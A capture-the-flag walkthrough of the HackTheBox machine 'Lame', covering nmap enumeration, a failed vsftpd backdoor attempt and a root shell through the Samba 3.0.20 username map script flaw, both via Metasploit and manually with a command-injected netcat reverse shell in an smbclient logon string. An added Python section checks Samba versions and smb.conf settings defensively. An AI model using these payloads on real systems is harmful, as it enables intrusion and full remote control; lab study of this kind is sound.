HackTheBox - Lame - Walkthrough

Metadata

IP: 10.129.77.236
Difficulty: Easy

Summary

This machine runs a vulnerable Samba version that can be exploited to obtain root access directly. In this post we exploit the vulnerability both manually and with Metasploit.

Enumeration

Nmap

We start off by running an nmap scan:

└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.77.236
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 17:50 EDT
Nmap scan report for 10.129.77.236
Host is up (0.11s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.55
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-06-22T17:51:29-04:00
|_clock-skew: mean: 2h00m15s, deviation: 2h49m43s, median: 14s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.17 seconds

Port 21

The nmap results show the FTP server version (vsftpd 2.3.4). We ran searchsploit to look for known vulnerabilities against that version.

└─$ searchsploit vsftpd 2.3.4
--------------------------------------------------------- ----------------------
 Exploit Title                                           |  Path
--------------------------------------------------------- ----------------------
vsftpd 2.3.4 - Backdoor Command Execution                | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)   | unix/remote/17491.rb
--------------------------------------------------------- ----------------------
Shellcodes: No Results

Port 445

The nmap scan shows that "Samba 3.0.20-Debian" is running on the machine. We ran searchsploit against that version to look for known vulnerabilities.

└─$ searchsploit Samba 3.0.20-Debian
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                              | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                     | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                               | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                       | linux_x86/dos/36741.py
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

vsftpd 2.3.4

We tried the vsftpd 2.3.4 backdoor exploits that searchsploit found, but they failed. The Metasploit attempt is shown below: the module completes without creating a session.

msf6 > search vsftpd 2.3.4 - Backdoor Command Execution

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.129.77.236
RHOSTS => 10.129.77.236
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.129.77.236:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.77.236:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Samba 3.0.20-Debian

Metasploit has a module for this vulnerability (exploit/multi/samba/usermap_script). We set the necessary options and ran the exploit, which opened a root shell on the machine.

msf6 exploit(multi/samba/usermap_script) > set rhosts 10.129.77.236
rhosts => 10.129.77.236
msf6 exploit(multi/samba/usermap_script) > set lhost 10.10.14.55
lhost => 10.10.14.55
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.55:4444 
[*] Command shell session 1 opened (10.10.14.55:4444 -> 10.129.77.236:46945 ) at 2022-06-22 19:27:38 -0400

shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /bin/bash
id
id
uid=0(root) gid=0(root)
root@lame:/#

Manual Exploitation (Without Metasploit)

We started by listing the shares available on the server with smbclient.

└─$ smbclient -L 10.129.77.236                      
Enter WORKGROUP\kali's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME

The tmp share is accessible with an anonymous login. After connecting to it we ran help to see which commands the smbclient shell offers.

└─$ smbclient //10.129.77.236/tmp
Enter WORKGROUP\kali's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              
smb: \>

The logon command can be used to get a reverse connection back to our machine. First we set up a listener locally with the following command:

└─$ nc -lnvp 4455
listening on [any] 4455 ...

We used the following command to get a reverse shell through SMB (the first line is the template, the second is what we ran):

logon "./=`nohup nc -e /bin/bash <IP> <port>`"
smb: \> logon "./=`nohup nc -e /bin/bash 10.10.14.55 4455`"
Password: 
session setup failed: NT_STATUS_IO_TIMEOUT
smb: \>

We got a reverse connection to our netcat listener.

└─$ nc -lnvp 4455
listening on [any] 4455 ...
connect to [10.10.14.55] from (UNKNOWN) [10.129.77.236] 54530
id  
uid=0(root) gid=0(root)
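As an added defender-side check covering both the Metasploit path and the manual logon path above (this is not part of the original walkthrough): the "username map script" command-execution bug is only reachable when the Samba version falls in the affected range (3.0.20 through 3.0.25rc3, as the searchsploit entry states) and that non-default smb.conf option is actually configured. The banner is the one nmap reported on this box; the smb.conf contents, its script path and the finding strings are constructed here for illustration.

```python
import re
from configparser import ConfigParser

# Constructed sample inputs: the banner nmap reported, plus an smb.conf that
# enables the non-default option behind the command-execution bug.
SAMBA_BANNER = "Samba 3.0.20-Debian"
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba %v)
   username map script = /etc/samba/scripts/mapusers.sh
   server signing = disabled

[tmp]
   comment = oh noes!
   path = /tmp
   guest ok = yes
   writable = yes
"""

FIRST_AFFECTED = (3, 0, 20, 1, 0)  # 3.0.20 final release
LAST_AFFECTED = (3, 0, 25, 0, 3)   # 3.0.25rc3

def parse_samba_version(banner):
    """Turn 'Samba 3.0.20-Debian' or '3.0.25rc3' into a sortable key.
    Release candidates sort before the final release of the same number."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", banner)
    if not m:
        raise ValueError(f"no Samba version in {banner!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1, int(rc or 0))

def version_in_affected_range(banner):
    return FIRST_AFFECTED <= parse_samba_version(banner) <= LAST_AFFECTED

def audit_smb_conf(conf_text):
    """List risky settings: the username map script (the exploited feature),
    disabled signing (nmap flagged it) and guest-writable shares like tmp."""
    cp = ConfigParser(strict=False, interpolation=None)
    cp.read_string(conf_text)  # keys are lowercased by ConfigParser
    g = cp["global"] if cp.has_section("global") else {}
    findings = []
    if g.get("username map script"):
        findings.append("username map script is set")
    if g.get("server signing", "").lower() == "disabled":
        findings.append("server signing disabled")
    for share in cp.sections():
        s = cp[share]
        if share != "global" and s.get("guest ok", "").lower() == "yes" \
                and s.get("writable", "").lower() == "yes":
            findings.append(f"share {share} is guest-writable")
    return findings

def usermap_exposed(banner, conf_text):
    """Exposed only when both hold: affected version AND the option is set."""
    return version_in_affected_range(banner) and \
        "username map script is set" in audit_smb_conf(conf_text)
```

Removing the username map script line (or upgrading past 3.0.25rc3) makes usermap_exposed return False even though the other findings may remain.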

Proof

The following command was used for this section:

root@lame:/root# hostname && whoami && cat root.txt && ip a             
hostname && whoami && cat root.txt && ip a
lame
root
646[...]
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:50:56:96:bc:a9 brd ff:ff:ff:ff:ff:ff
    inet 10.129.77.236/16 brd 10.129.255.255 scope global eth0
    inet6 dead:beef::250:56ff:fe96:bca9/64 scope global dynamic 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:fe96:bca9/64 scope link 
       valid_lft forever preferred_lft forever
root@lame:/root#